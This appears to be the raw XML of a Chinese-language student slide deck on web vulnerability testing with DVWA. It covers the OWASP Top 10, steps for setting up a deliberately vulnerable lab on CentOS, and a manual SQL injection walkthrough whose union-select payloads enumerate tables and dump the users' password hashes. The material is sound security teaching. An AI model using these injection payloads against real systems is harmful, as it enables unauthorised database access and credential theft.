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93" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="295" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="286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5A6"/>
    <a:srgbClr val="FAEDBF"/>
    <a:srgbClr val="DD6657"/>
    <a:srgbClr val="71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60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22BE1-D702-4EDE-92A3-31307E401240}" type="datetimeFigureOut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FA5E8-6199-4649-800D-39E54CE334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37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CB96-0046-4430-9133-C8EB0531FA1C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22870" y="6173788"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200">
                <a:latin typeface="Adobe Gothic Std B" panose="020B0800000000000000" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C65DE1B4-D86D-4C05-8081-94158E63115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843281" y="5633437"/>
            <a:ext cx="881597" cy="929356"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71A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564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A287-CB66-4BC6-AE47-FCBDA6C6A878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94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F155-52E0-42CD-97BB-61558747C3D3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90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FEE3-4A9A-4FEC-B89F-BC0C17CDAAAF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42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88910-D0E8-4546-A5AD-575021D2B3C6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60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5E13-C129-4F12-9C8A-ED9D8516C177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10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92E-738C-4B16-87FD-BE2DDB4E6CAD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134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94145-1D4B-4051-81FA-E66EBC532119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60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FA5A-A347-4D9F-B0B5-A9F3B603E82A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76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E837-6D97-4B99-8B89-32209944E99D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18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610F-E67C-42B9-A028-0189A863EB82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43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94DB2-9AC1-4D85-85E4-F6A8B5C65B3E}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/12/28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E1B4-D86D-4C05-8081-94158E631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48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uf.com/articles/web/123779.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ithelp.ithome.com.tw/articles/1020705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knews.cc/zh-tw/code/gmrl299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hicalhack3r/DVWA/archive/master.zi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4853793" y="1068325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崑山科大資訊工程所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人工智慧與資訊安全課程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572569" y="1340551"/>
            <a:ext cx="3837062" cy="4066627"/>
            <a:chOff x="504202" y="1130165"/>
            <a:chExt cx="3837062" cy="4066627"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="群組 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="504202" y="1130165"/>
              <a:ext cx="3837062" cy="4066627"/>
              <a:chOff x="504202" y="1130165"/>
              <a:chExt cx="3837062" cy="4066627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 rotWithShape="1">
              <a:blip r:embed="rId2"/>
              <a:srcRect l="7836" r="7652" b="8561"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="504202" y="1130165"/>
                <a:ext cx="3837062" cy="4066627"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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4085" y="3978685"/>
                <a:ext cx="2447680" cy="507858"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grp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8137" y="2611612"/>
              <a:ext cx="2107094" cy="551865"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973216" y="4885653"/>
            <a:ext cx="3331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課程教授：恩師 龍大大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algn="ctr"/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報告人：薛博仁</a:t>
            </a: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34370" y="2731986"/>
            <a:ext cx="4104009" cy="1321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網站漏洞分析與實務</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty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sz="2800" dirty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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty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網站安全測試報告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800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4572000" y="538385"/>
            <a:ext cx="0" cy="5742774"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85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環境部署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(3)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29306" y="1446344"/>
            <a:ext cx="87146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http://localhost/setup.php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DeBug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00" y="2081398"/>
            <a:ext cx="4206000" cy="43226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4786653" y="2081398"/>
            <a:ext cx="3665197" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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PHP function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600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allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty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至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en-US" altLang="zh-TW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etc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/php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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endParaRPr lang="en-US" altLang="zh-TW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查詢關鍵詞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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allow_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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endParaRPr lang="en-US" altLang="zh-TW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找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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allow_url_include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= Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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zh-TW" altLang="en-US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將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Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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改為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On</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty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6653" y="3605959"/>
            <a:ext cx="3665197" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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755  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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/www/html/external/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600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phpids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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/0.6/lib/IDS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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/phpids_log.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600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1600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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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755</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty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16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en-US" altLang="zh-TW" sz="1600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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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/www/html/hackable/uploads/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty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1600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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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755</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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en-US" altLang="zh-TW" sz="1600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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600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/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600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config</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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93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環境部署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(4)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29306" y="1446344"/>
            <a:ext cx="8714694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http://localhost/setup.php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34" y="1990860"/>
            <a:ext cx="4341931" cy="4458446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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22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環境部署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(5)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29306" y="1691607"/>
            <a:ext cx="87146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Create / Reset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DataBase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21295" y="2324456"/>
            <a:ext cx="4974439" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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Could not connect to the database service.</a:t>
            </a:r>
          </a:p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Please check the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config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file.</a:t>
            </a:r>
          </a:p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DataBase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Error #2054: The server requested</a:t>
            </a:r>
          </a:p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authentication method unknown to the client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21294" y="3630538"/>
            <a:ext cx="7098418" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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vim  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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etc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en-US" altLang="zh-TW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my.cnf.d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en-US" altLang="zh-TW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mysql-server.cnf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1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mysqld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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty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以下內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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en-US" altLang="zh-TW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zh-TW" altLang="en-US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default-authentication-plugin=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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mysql_native_password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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restart  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD665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mysqld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="DD665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3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2" y="2142992"/>
            <a:ext cx="4347963" cy="3604412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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521295" y="605196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環境部署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(6)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29306" y="1446344"/>
            <a:ext cx="8714694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部署完成就能登入囉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~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9729" y="4885630"/>
            <a:ext cx="2261907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預設登入：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Username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admin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Passwod:password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53" y="2142992"/>
            <a:ext cx="3953975" cy="3900080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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12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669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DVWA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實戰：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Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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36331"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277828" y="2661395"/>
            <a:ext cx="6588343" cy="35123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字方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429306" y="1691607"/>
            <a:ext cx="2390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點選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Command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Injection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3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3913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DVWA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實戰：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SQLI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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99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3764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DVWA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實戰：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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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2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學習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心得</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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7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228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參考文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獻</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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104901" y="1828799"/>
            <a:ext cx="7067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飛飛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安補帖─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Day21─DVWA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ithelp.ithome.com.tw/articles/10207050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,2018</a:t>
            </a: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2]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lonehand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Novice Guide: XSS Gold Coins of DVWA-1.9 Full Level Tutorial (Completed, with Examples),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www.freebuf.com/articles/web/123779.html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,2016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[3]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黑客學習灬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梁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黑客滲透攻擊必備環境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DVWA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簡介及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kknews.cc/zh-tw/code/gmrl299.html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,2019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53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31" y="883400"/>
            <a:ext cx="5197538" cy="5091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68" y="2608470"/>
            <a:ext cx="2391263" cy="6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大綱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75801" y="1471284"/>
            <a:ext cx="6037605" cy="3915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網站的資安威脅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OWASP TOP 10 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到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OWASP API TOP 10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DVWA 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測試平台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DVWA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實戰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:SQLI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DVWA</a:t>
            </a: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實戰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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:XSS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學習心得</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="24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54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351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SQL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手動注入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(1)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29306" y="1691607"/>
            <a:ext cx="87146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上面用的是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sqlmap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獲取資料庫資訊，現在使用手工注入來獲取資料庫的資訊。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思路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判斷是否存在注入，注入是字元型還是數字型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猜解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SQL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查詢語句中的欄位數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確定顯示的欄位順序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獲取當前資料庫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獲取資料庫中的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表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2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6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獲取表中的欄位名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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7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.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下載資料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52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351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SQL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手動注入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(2)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18211" y="1189971"/>
            <a:ext cx="87146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後端資料庫語句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SELECT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first_name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last_name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FROM users WHERE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user_id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= '$id'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）輸入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，查詢成功。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 輸入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1' or '1'='1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，返回了多個結果，說明存在字元型注入。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傳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到後端語句變為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SELECT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first_name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,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last_name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FROM users WHERE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user_id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= '1' or '1'='1'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03" y="3775294"/>
            <a:ext cx="4708733" cy="2264391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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952" y="3775294"/>
            <a:ext cx="2384276" cy="2716178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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41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351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SQL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手動注入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(3)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18211" y="1189971"/>
            <a:ext cx="871469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）輸入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1' or 1=1 order by 2 #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，查詢成功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 輸入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1' or 1=1 order by 3 #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，查詢失敗。說明欄位為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也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可以通過輸入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1‘ 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union select 1,2 #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來猜解欄位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數。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3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）獲取當前資料庫，輸入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1' union select 1,database() #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，查詢成功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當前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的資料庫為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dvwa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503" y="3063266"/>
            <a:ext cx="4572000" cy="2543175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4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351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SQL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手動注入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(4)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18211" y="1600170"/>
            <a:ext cx="8714694" cy="1297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4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）獲取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資料庫中的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表輸入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1' union select 1,group_concat(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table_name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 from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information_schema.tables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where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table_schema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=database() #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，查詢成功。資料庫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dvwa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中一共有兩個表，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guestbook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與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users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95" y="3050183"/>
            <a:ext cx="8127049" cy="1673216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61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351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SQL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手動注入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(5)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18211" y="1600169"/>
            <a:ext cx="8714694" cy="212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5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）獲取表中的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欄位名輸入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1' union select 1,group_concat(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column_name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 from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information_schema.columns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where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table_name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='users' #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，查詢成功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users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表中有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8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個欄位，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分別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是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user_id,first_name,last_name,user,password,avatar,last_login,failed_login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341494"/>
            <a:ext cx="8298589" cy="2407224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46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351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SQL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手動注入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(6)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18211" y="1600169"/>
            <a:ext cx="8714694" cy="1297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（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7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）下載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資料輸入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1' or 1=1 union select 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group_concat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user_id,first_name,last_name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),</a:t>
            </a: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group_concat</a:t>
            </a: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(password) from users #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，查詢成功。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35377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903843" y="2604954"/>
            <a:ext cx="6684681" cy="356235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16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前言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="320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(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="320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 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的資安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威脅</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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139190" y="1641833"/>
            <a:ext cx="6679645" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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XSS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Cross-Site Scripting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CSRF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Site Request Forgery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Hijacking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5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前言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="320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(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="320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 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的資安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威脅</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200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-1" b="65742"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="475624" y="1428750"/>
            <a:ext cx="8192751" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475624" y="4109819"/>
            <a:ext cx="4572000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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款擴充程式都是以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還可下載其它的惡意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624" y="2946002"/>
            <a:ext cx="4572000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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惡意程式碼主要可挾持使用者的流量，先導至第三方伺服器，再導向使用者真正想要造訪的網站，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1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目的是為了竊取使用者的資料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625" y="4996637"/>
            <a:ext cx="4572000" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6"/>
            </a:solidFill>
          </a:ln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惡意的擴充程式多半與熱門服務有關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款具備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Instagram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的直接傳訊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、上傳或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Stories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款提供影片下載功能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款程式的下載量總計超過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萬次。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047624" y="2946002"/>
            <a:ext cx="38571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https://www.ithome.com.tw/news/141737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93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7497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前言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(2)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</a:t>
            </a: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OWASP TOP 10 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到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		OWASP </a:t>
            </a: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API TOP 10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339215" y="2127608"/>
            <a:ext cx="6679645" cy="3600986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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OWASP TOP 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1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Injection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Broken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Sensitive Data Exposure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XML External Entities (XXE)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Broken Access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Security misconfigurations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Site Scripting (XSS)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Insecure Deserialization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Using Components with known vulnerabilities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Insufficient logging and monitoring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5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7497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前言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(2)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從</a:t>
            </a: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OWASP TOP 10 </a:t>
            </a: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到</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="32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		OWASP </a:t>
            </a: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API TOP 10 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339215" y="2127608"/>
            <a:ext cx="6679645" cy="3600986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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OWASP API TOP 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD66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Broken Object Level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Authorization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Broken Authentication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Excessive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Lack of Resources &amp; Rate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Limiting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Broken Function Level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Authorization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Mass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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="20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Misconfiguratio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Injection	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Improper Assets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Insufficient Logging &amp; Monitoring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42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3571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DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="32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測試平台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791199" y="1536174"/>
            <a:ext cx="2827146" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5E85A6"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A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模組安全等級：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400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Low-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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完全沒有安全措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400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Medium-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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有保護，但沒有保護到</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400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High-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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有保護，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="14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但可繞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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過保護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   CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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比賽多為這種等級</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean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smtClean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Impossible-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="14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安全的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21295" y="1536174"/>
            <a:ext cx="5057775" cy="4750403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAEDBF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5E85A6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進行安全脆弱評鑑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漏洞檢測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1.Bruce Force //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暴力破解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2.Command Injection //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命令注入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3.CSRF //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跨站請求偽造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4.File Inclusion //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文件包含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5.File Upload //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文件上傳漏洞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6.Insecure CAPTCHA //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不安全的驗證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7.SQL Injection //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8.SQL Injection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Blind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注入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9.XSS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Reflected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反射型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XSS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10.XSS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Stored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存儲型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30067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環境部署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(1)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29306" y="1626561"/>
            <a:ext cx="8714694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作業系統：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0715" y="174027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CentOS 8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82906" y="2177865"/>
            <a:ext cx="772112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wget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sz="16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https://github.com/ethicalhack3r/DVWA/archive/master.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600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unzip  master.zip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306" y="2183306"/>
            <a:ext cx="18373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安裝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DVWA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60715" y="2954011"/>
            <a:ext cx="7721126" cy="1297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yum   install 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httpd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yum   install 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mysql-devel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mysql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-libs  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mysql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mysql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-server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yum   install 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php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php-pdo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php-mysqlnd  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php-gd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9306" y="2962695"/>
            <a:ext cx="16273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安裝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環境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：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81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521295" y="605196"/>
            <a:ext cx="27815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環境部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200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(2)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429306" y="1691607"/>
            <a:ext cx="8714694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移動環境：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60715" y="1740274"/>
            <a:ext cx="443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cp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-a   DVWA-master/*   /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var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/www/html/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0715" y="2158273"/>
            <a:ext cx="772112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cp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/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var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/www/html/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config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config.inc.php.dist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\ /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var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/www/html/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config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config.inc.php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vim    /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var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/www/html/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config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/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config.inc.php</a:t>
            </a:r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$_DVWA[ ‘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db_password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’ ] = “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輸入資料庫的密碼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$_DVWA[ ‘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recaptcha_public_key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’ ] =“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設定加密後的密碼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      $_DVWA[ ‘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recaptcha_private_key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’ ] =“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設定加密後的密碼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”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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9306" y="2183306"/>
            <a:ext cx="16273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修改設定：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29306" y="5159094"/>
            <a:ext cx="8714694" cy="466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密碼加密：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openssl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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1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passwd</a:t>
            </a:r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-6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E1B4-D86D-4C05-8081-94158E63115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6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11151</TotalTime>
  <Words>998</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>192</Paragraphs>
  <Slides>25</Slides>
  <Notes>0</Notes>
  <HiddenSlides>6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Adobe Gothic Std B</vt:lpstr>
      <vt:lpstr>Adobe 繁黑體 Std B</vt:lpstr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薛 博仁</dc:creator>
  <cp:lastModifiedBy>薛 博仁</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-03T05:15:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-30T11:58:57Z</dcterms:modified>
</cp:coreProperties>
</file>